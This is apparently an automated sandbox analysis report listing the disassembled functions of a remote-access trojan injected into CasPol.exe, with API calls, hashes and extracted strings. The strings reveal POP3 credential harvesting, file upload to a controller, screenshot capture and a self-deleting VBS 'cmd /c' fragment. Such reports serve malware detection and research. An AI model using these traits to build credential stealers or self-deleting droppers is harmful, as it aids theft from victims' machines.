                                                                                                • Instruction Fuzzy Hash: D20171A4E40B1635CB206F7B7C94D17AEAC9E503503160837A406F32A1EEBCD400CD7D
                                                                                                APIs
                                                                                                  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                • _strlen.LIBCMT ref: 10001855
                                                                                                • _strlen.LIBCMT ref: 10001869
                                                                                                • _strlen.LIBCMT ref: 1000188B
                                                                                                • _strlen.LIBCMT ref: 100018AE
                                                                                                • _strlen.LIBCMT ref: 100018C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                • API String ID: 3296212668-3023110444
                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B3E1
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041B3F9
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B412
                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B44D
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B460
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B4A4
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B4BF
                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B4D7
                                                                                                • _wcslen.LIBCMT ref: 0041B4E6
                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041B506
                                                                                                • GetLastError.KERNEL32 ref: 0041B51E
                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B54B
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041B564
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B573
                                                                                                • GetLastError.KERNEL32 ref: 0041B57B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                • String ID: ?
                                                                                                • API String ID: 3941738427-1684325040
                                                                                                • Opcode ID: ab6c0a2e820866b083e3708fbad612f297667e297ed8968616fd37775c99846c
                                                                                                • Instruction ID: f0577cbf519c1fbc76aa3138d797bbd7c283cc622b072e5c2a83b2d98bec9820
                                                                                                • Opcode Fuzzy Hash: ab6c0a2e820866b083e3708fbad612f297667e297ed8968616fd37775c99846c
                                                                                                • Instruction Fuzzy Hash: 8441A071504705ABC720DF61E8489EBB7E8EB48705F00482FF541D2262EF78D989CBDA
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                • API String ID: 4218353326-230879103
                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 3899193279-0
                                                                                                • Opcode ID: 262f4bc2fcd2cd8b8b62aced960dc72ebafc7423105dd6770d70a0c7e5bb49b0
                                                                                                • Instruction ID: a8aac0df7486383d9a181904d39d16e24afc3d72eb934652fe50c6e09291e228
                                                                                                • Opcode Fuzzy Hash: 262f4bc2fcd2cd8b8b62aced960dc72ebafc7423105dd6770d70a0c7e5bb49b0
                                                                                                • Instruction Fuzzy Hash: 5DD12771D00310AFFB21AF77888166E7BA4BF01368F45416FF945A7381EA399E418B9D
                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413F5E
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413FA0
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413FC0
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413FC7
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413FFF
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414011
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414018
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414027
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0041403E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                • API String ID: 2490988753-744132762
                                                                                                • Opcode ID: a1ebb0e7ad90273c6050595515f5be941597b1bff8e5ee6fc120c50391cee153
                                                                                                • Instruction ID: be6955175b5ce73d91635d8a52bfbd354ab09fdd92d7e760b1966c561f7cb5d0
                                                                                                • Opcode Fuzzy Hash: a1ebb0e7ad90273c6050595515f5be941597b1bff8e5ee6fc120c50391cee153
                                                                                                • Instruction Fuzzy Hash: B33117B280131567D320EF55DC84EDB7BDCAF89745F01092AFA88A3201D73CD98587AE
                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CCF4
                                                                                                • GetCursorPos.USER32(?), ref: 0041CD03
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041CD0C
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CD26
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B50), ref: 0041CD77
                                                                                                • ExitProcess.KERNEL32 ref: 0041CD7F
                                                                                                • CreatePopupMenu.USER32 ref: 0041CD85
                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CD9A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: bed582d39fc96e8479943e4d89b527f8ff9ef20370aed2009df63d45acb158b0
                                                                                                • Instruction ID: 460fc807693895ecf387abb2373bcbc61375cccb84b7011694e880842115b21a
                                                                                                • Opcode Fuzzy Hash: bed582d39fc96e8479943e4d89b527f8ff9ef20370aed2009df63d45acb158b0
                                                                                                • Instruction Fuzzy Hash: F321F831140205EFDB054FA4FD4DBAA3F65EB04702F004539FA0AA41B1DBB6ED91EB59
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 39c5139744f4540f523a9af4ed2fa8afb712fe0565144d4bd577e3f50ea1b080
                                                                                                • Instruction ID: de18a1b700a064f56ed707831433d851a0809218b1b1d193042f08ca5b0df7c8
                                                                                                • Opcode Fuzzy Hash: 39c5139744f4540f523a9af4ed2fa8afb712fe0565144d4bd577e3f50ea1b080
                                                                                                • Instruction Fuzzy Hash: 59B190719006059FEF11DF69C881BEEBBF4FF09304F14406EF895AB252DA799C459B24
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                • API String ID: 1884690901-2582957567
                                                                                                • Opcode ID: f21b18ce01fce66243cc1539b9d516c223a56a4a737dfa711b72246376885adf
                                                                                                • Instruction ID: fe8c5194ffe86d3827a7b181bfbb3d0fd3c62202293e6b84b2d5449ede98e066
                                                                                                • Opcode Fuzzy Hash: f21b18ce01fce66243cc1539b9d516c223a56a4a737dfa711b72246376885adf
                                                                                                • Instruction Fuzzy Hash: 73B182716083409BC614FB25C892BAFB7E5AFD4314F40492EF889632D2EF789945C79B
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                                • _free.LIBCMT ref: 10007D32
                                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                                • _free.LIBCMT ref: 10007D72
                                                                                                • _free.LIBCMT ref: 10007D80
                                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 004502C1
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F510
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F522
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F534
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F546
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F558
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F56A
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F57C
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F58E
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5A0
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5B2
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5C4
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5D6
                                                                                                  • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5E8
                                                                                                • _free.LIBCMT ref: 004502B6
                                                                                                  • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                                                                  • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                                                                • _free.LIBCMT ref: 004502D8
                                                                                                • _free.LIBCMT ref: 004502ED
                                                                                                • _free.LIBCMT ref: 004502F8
                                                                                                • _free.LIBCMT ref: 0045031A
                                                                                                • _free.LIBCMT ref: 0045032D
                                                                                                • _free.LIBCMT ref: 0045033B
                                                                                                • _free.LIBCMT ref: 00450346
                                                                                                • _free.LIBCMT ref: 0045037E
                                                                                                • _free.LIBCMT ref: 00450385
                                                                                                • _free.LIBCMT ref: 004503A2
                                                                                                • _free.LIBCMT ref: 004503BA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 0aefceb04b648aea5efd53e91dec8318d050154b6956abd82aee10787160205d
                                                                                                • Instruction ID: 8d5a52dc196ca223d521196e0170462af54da78aea2ffa7a7b46d1c1532e12ca
                                                                                                • Opcode Fuzzy Hash: 0aefceb04b648aea5efd53e91dec8318d050154b6956abd82aee10787160205d
                                                                                                • Instruction Fuzzy Hash: 57316F355003009FEB20AA79D84AB5B73E9EF01365F51445FF88AD7652DF38AC48D719
                                                                                                APIs
                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 0041BA95
                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041BAC6
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0041BD5F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumOpen
                                                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                                                                                • API String ID: 1332880857-3730529168
                                                                                                • Opcode ID: 90d1dda6fecee6ad9e788e374cf984eedcdf559a07e1e29c8b7a1bd79dded3a2
                                                                                                • Instruction ID: 0bdba4d5443de57538e8dea8c505e9c6563ea9aa0cda83444964b9bd965e15eb
                                                                                                • Opcode Fuzzy Hash: 90d1dda6fecee6ad9e788e374cf984eedcdf559a07e1e29c8b7a1bd79dded3a2
                                                                                                • Instruction Fuzzy Hash: 76612E311082409FD324FB21D991AEFB7E5BFD4314F10493FB586921E1EF34AA59CA9A
                                                                                                APIs
                                                                                                  • Part of subcall function 00411771: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                                                                  • Part of subcall function 00411771: WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                                                                  • Part of subcall function 00412735: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                                                                  • Part of subcall function 00412735: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                                                                  • Part of subcall function 00412735: RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000000), ref: 0040C826
                                                                                                • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$PSG$Temp$exepath$open
                                                                                                • API String ID: 1913171305-1605470806
                                                                                                • Opcode ID: 2609b0d94b27e519916e9185d48a9b0478d317f2a3309830ae44d41ab4c02fda
                                                                                                • Instruction ID: 0a59ab1ac2652dc6c4b0de1f1bfb113b457f9f33def171b9a9917dadcc9857af
                                                                                                • Opcode Fuzzy Hash: 2609b0d94b27e519916e9185d48a9b0478d317f2a3309830ae44d41ab4c02fda
                                                                                                • Instruction Fuzzy Hash: 2E416D329101185ACB14F761DC56DFE7779AF50708F10417FF806B31E2EE786A8ACA98
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: b030283a6c0ce51ba92dd09d555ed862ebb201d4cb761b5ee972a13664eb7e13
                                                                                                • Instruction ID: 986e8a668492dbee8f9f46891c6c86f5dcf9ebf43b9fca0c5b911ed3811bef24
                                                                                                • Opcode Fuzzy Hash: b030283a6c0ce51ba92dd09d555ed862ebb201d4cb761b5ee972a13664eb7e13
                                                                                                • Instruction Fuzzy Hash: 1FC15371D40204BBEB20EAA8CC82FEE77B89B08704F15416AFE45FB282D6749D459768
                                                                                                APIs
                                                                                                  • Part of subcall function 00454860: CreateFileW.KERNEL32(00000000,?,?,;LE,?,?,00000000,?,00454C3B,00000000,0000000C), ref: 0045487D
                                                                                                • GetLastError.KERNEL32 ref: 00454CA6
                                                                                                • __dosmaperr.LIBCMT ref: 00454CAD
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00454CB9
                                                                                                • GetLastError.KERNEL32 ref: 00454CC3
                                                                                                • __dosmaperr.LIBCMT ref: 00454CCC
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00454CEC
                                                                                                • CloseHandle.KERNEL32(?), ref: 00454E36
                                                                                                • GetLastError.KERNEL32 ref: 00454E68
                                                                                                • __dosmaperr.LIBCMT ref: 00454E6F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 7241ecee4a5f1f89fc763009d89c6ec11b2c57897b1f7dc41199f6beedf99759
                                                                                                • Instruction ID: a1ee14646c220e05fb339a94c39d658440f80e8cb8884f5184f0ba1168eb6fd8
                                                                                                • Opcode Fuzzy Hash: 7241ecee4a5f1f89fc763009d89c6ec11b2c57897b1f7dc41199f6beedf99759
                                                                                                • Instruction Fuzzy Hash: EBA126319045489FDF19DF68D8427AE7BB1EB46329F14015EEC01AF392CB398896CB5A
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00419323
                                                                                                • GdiplusStartup.GDIPLUS(00474AF4,?,00000000), ref: 00419355
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004193E1
                                                                                                • Sleep.KERNEL32(000003E8), ref: 00419463
                                                                                                • GetLocalTime.KERNEL32(?), ref: 00419472
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041955B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$VG$VG
                                                                                                • API String ID: 489098229-455837001
                                                                                                • Opcode ID: 92f7b4923305aa32c89fe571e855d6589c495986d7bade82338304b44666fde6
                                                                                                • Instruction ID: fd6a6a94d4e700b4a78141c9ee43bb9ee9cebd21b8d39b126fa21a823fd8be24
                                                                                                • Opcode Fuzzy Hash: 92f7b4923305aa32c89fe571e855d6589c495986d7bade82338304b44666fde6
                                                                                                • Instruction Fuzzy Hash: 9F517B71A002449ACB14BBB5C866AFE7BA9AB55308F40403FF845B71D2EF3C5E85C799
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
